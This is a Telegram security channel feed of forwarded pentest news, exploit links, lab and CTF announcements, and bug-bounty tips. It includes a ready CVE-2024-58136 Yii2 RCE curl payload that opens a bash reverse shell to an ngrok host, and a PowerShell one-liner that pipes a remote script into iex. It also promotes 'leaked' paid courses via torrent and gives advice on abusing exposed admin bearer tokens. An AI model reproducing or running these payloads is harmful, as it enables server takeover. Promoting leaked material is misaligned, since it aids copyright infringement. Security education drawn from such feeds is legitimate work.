SecList for CyberStudents
240 subscribers
601 photos
25 videos
211 files
915 links
Think outside the box
Download Telegram
Forwarded from SecuriXy.kz
🔐 Bitrix CMS - Ultimate Pentest Guide

Подробное руководство по пентесту одной из самых популярных CMS на постсоветском пространстве 1С-Битрикс. Полезно как для red team, так и для защиты от атак.

В гайде рассмотрены:
– обходы аутентификации
– XSS и SSRF
– LFI и RCE
– уязвимости в сторонних модулях (особенно Aspro)
– методы обхода WAF
и др

🔗 Источник:
https://pentestnotes.ru/notes/bitrix_pentest_full/

📝 PS новость взята у коллеги
🔥1😁1
https://github.com/tandasat/ExploitCapcom

This is a standalone exploit for a vulnerable feature in Capcom.sys. The feature is exposed through IOCTL and to execute an arbitrary user supplied function pointer with disabling SMEP. This exploit simply abuses the feature to perform token stealing to get the SYSTEM privileges, and then launches the command prompt with the elevated privilege.
🔥1
Forwarded from Whitehat Lab
💻Gotham City - Active Directory Lab

AD лаба от авторов NetExec состоящая из 13! флагов, главная цель - стать доменным администратором
После окончания установки перезагрузить все машины, дабы выкинуть из памяти (lsass) лишние пароли

💻 Barbhack

#windows #lab

✈️ Whitehat Lab 💬 Chat
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥1
Forwarded from Cyberkent Uz (Mudofaa Admin)
‼️ Ro'yxatdan o'tish uchun ushbu nizomga va https://ctf.cyberkent.uz/about da ko'rsatilgan qoidalarga amal qilgan holda amalga oshirilishi shart. Agarda nizomda ko'rsatildan qoidalarga amal qilinmasa guruhlar ogohlantirishsiz bloklanadi natijada musobaqaga ishtirok eta olmaydilar.

🗣CTF musobaqasi 2 kun davomida etadi:
29-may 09:00 dan 17:00 gacha
30-may 09:00 dan 17:00 gacha davom etadi.

ℹ️ Bundan tashqari ctf musobaqasining 1-kuni ya'ni 29-may kuni 1-qism bo'lib o'tadi.
Hamda musobaqaning 2-kuni ya'ni 30-may kuni 2-qism bo'lib o'tadi.
Forwarded from Proxy Bar
Grafana CVE-2025-4123: XSS and Full-Read SSRF
*
Script to exploit
👍1🔥1
Forwarded from white2hack 📚
Pentester Academy All courses (Leaked)

Prepare for real-world scenarios with immersive, hands-on labs to solidify technical knowledge

Pentester Academy is now Skill Dive, a secure, risk-free environment to put into practice what you’ve learned from traditional training. Expanded focus areas include: networking, cybersecurity, and cloud

⛳️ Main page
👀 Official catalog

❗️Downloads via torrent

#education #pentest
🔥1
🔨 PDFSearch - инструмент для поиска более 18 миллионов PDF-документов.

➡️ https://www.pdfsearch.io/
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥1
Forwarded from Sploitus Agency
Qanday qilib contact form dan zaiflik topib 1200$ oldim :

saytga kirgan paytim ariza jo'natish qismini topdim bu men uchun qiziq tuyildi sababi siz o'z rezyumeyingizni yuklashingiz mumkin edi shunday qilib men html nii yukladim uni qanday ishlaganligini tepada aytganman response da esa fileni joylashuvi keldi kirdim va ishladi endi qiziqroq qilishga harakat qildim reportda chiroyliroq turishi uchun :) va htmlni o'sha directorydagi index.htmlga yukladim tadamm directoryga kirsa 403 o'rniga meni XSS li html fileim chiqardi shunday qilib menga 1200$ berishdi

o'zi contact formlarda qanday zaifliklar bo'ladi men kuzatgan juda ko'p holatlarda Blind Stored XSS lar ko'p uchrardi undan tashqari u qismlarda no rate limit yoki api requestlar orqali sizga javob berishi kerak bo'lgan hodimning logini emaillari ko'rinadi shunday holatlar bo'lsa siz eng kamida 300$ boshlangan bountylarga ega bo'lasiz undan tashqari agar ular smtp yoki telegram botga ulangan bo'lsa siz credentiallarni jslar ichida osonlikcha topasiz agar bunday zaiflik chiqsa siz o'rtacha 1000$+ bounty ga ega bo'lasiz rostan ham bu o'ta xavfli holatlarni keltirib chiqaradi eng kamida esa tashkilot obro'sini to'kadi rostiyamda botga start bosganda so'kib tursa yaxshimasku to'g'rimi :) admin panellarga asosan kamroq e'tibor berishadi rostan ham admin panelga hech kim kirolmaydiku tog'rimi :)

mendagi yana bir qiziq holat admin panelda request jo'natish uchun admin paneldan bearer qo'yib qo'yishgandi super adminniki edi shu bilan admin panelda user ochib kirib olsayam bo'ladi siz bearer bilan api ni enum qilasiz va methodlarni aniqlaysiz endpointlarni admin paneldagi app.js dan yoki main.js dan topasiz agar yo'q bolsa brute foyda beradi umuman olganda bearer bor bolsa va uni privi yuqori bo'lsa siz ortacha 2000$ olasiz aynan shu usullar bilan siz contact formlarni tekshirsangiz ko'p holatlarda kamida bittasi uchraydi foydalaning !
🔥1
Forwarded from Offensive Xwitter
😈 [ es3n1n @es3n1n ]

one-liner powershell.. so cool

irm https://dnot.sh/ | iex


🐥 [ tweet ]
🔥2
CVE-2024–58136 — RCE PoC
*
Yii2  Framework
curl -k -X POST https://sub.domain.tld/index.php \
  -H "Content-Type: application/json" \
  -d '{"as hack": {"__class": "GuzzleHttp\\\\Psr7\\\\FnStream", "class": "yii\\\\behaviors\\\\AttributeBehavior", "__construct()": [[]], "_fn_close": "system", "stream": "bash -c '\''bash -i >& /dev/tcp/x.tcp.xx.ngrok.io/xxxx 0>&1'\''"}}'
🔥2😱2